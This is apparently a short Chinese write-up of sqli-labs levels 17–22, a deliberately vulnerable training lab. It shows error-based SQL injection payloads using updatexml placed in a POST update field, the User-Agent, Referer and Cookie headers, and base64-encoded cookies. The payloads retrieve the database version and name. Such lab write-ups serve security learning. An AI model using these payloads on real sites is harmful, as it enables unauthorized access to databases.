1.POST update注入(17关)

爆出数据库的版本,1' or updatexml (1,concat(0x7e,version(),0x7e),1) #

sqlilab 17-22简略版

2.Header报错 (18关)

在UA末尾添加'报错,存在注入点

sqlilab 17-22简略版

注入语句:1',1,updatexml(1,concat(0x7e,database(),0x7e),1)) #

爆出数据库为security

 sqlilab 17-22简略版

3.Referer(19关)

在Referer末尾加单引号,报错

sqlilab 17-22简略版

Referer: 1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) and '1'='1

sqlilab 17-22简略版 4.cookie(20关)

在原始界面输入内容返回如下,尝试抓包后在cookie后注入

sqlilab 17-22简略版

Cookie: uname=admin' and updatexml(1,concat(0x7e,(select database()),0x7e),1) and '1'='1

sqlilab 17-22简略版

 5.BASE64转码(21关,22关更换为双引号)

输入用户名和密码为admin后显示为YWRtaW4=

sqlilab 17-22简略版

通过burp suite转码后结果为admin

sqlilab 17-22简略版

所以我们将注入的语句通过base64进行编码,复制到cookie参数后面

sqlilab 17-22简略版

 如下,就可以看到库名了sqlilab 17-22简略版

相关文章:

  • 2022-12-23
  • 2021-12-20
  • 2021-11-04
  • 2022-12-23
  • 2021-12-26
  • 2021-12-23
  • 2021-04-14
  • 2022-01-26
猜你喜欢
  • 2022-12-23
  • 2021-07-14
  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
相关资源
相似解决方案